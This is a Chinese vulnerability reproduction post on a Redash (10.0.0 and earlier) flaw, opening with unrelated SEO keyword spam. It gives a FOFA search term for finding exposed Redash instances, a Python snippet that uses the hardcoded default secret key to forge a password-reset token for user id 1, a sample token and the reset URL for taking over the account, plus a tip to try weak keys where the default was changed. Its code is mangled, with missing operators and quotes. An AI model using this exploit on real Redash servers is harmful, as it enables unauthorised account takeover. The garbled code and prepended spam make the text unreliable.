爱站网长尾关键词挖掘工具下载,前端课程网站,设备网站开发,适合做网站服务器的主机Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞#xff0c;攻击者可利用该漏洞来使用已知的默认值伪造会话。
1.漏洞级别
中危
2.漏洞搜索
fofa
redash…Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞攻击者可利用该漏洞来使用已知的默认值伪造会话。
1.漏洞级别
中危
2.漏洞搜索
fofa
redash3.影响范围
Redash 10.0.04.漏洞复现
漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key如果用户不手动修改的话我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token因此我们可以直接生成一个有效的找回链接。 可以执行如下python代码
from itsdangerous import URLSafeTimedSerializer
if __name__ __main__:serializer URLSafeTimedSerializer(c292a0a3aa32397cdb050e233733900f)key serializer.dumps(1)print(key)生成的有效负载
IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18由于生成的有效负载存在过期时间因此每次测试的时候最好重新生成一下。c292a0a3aa32397cdb050e233733900f为默认key。如果用户手动修改了这个key我们也可以尝试使用一些弱口令来生成负载尝试一下。 访问路径
url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18如果出现即为漏洞存在 出现这个表示key已被修改过了 到这里漏洞就复现成功了。 如果有问题欢迎随时沟通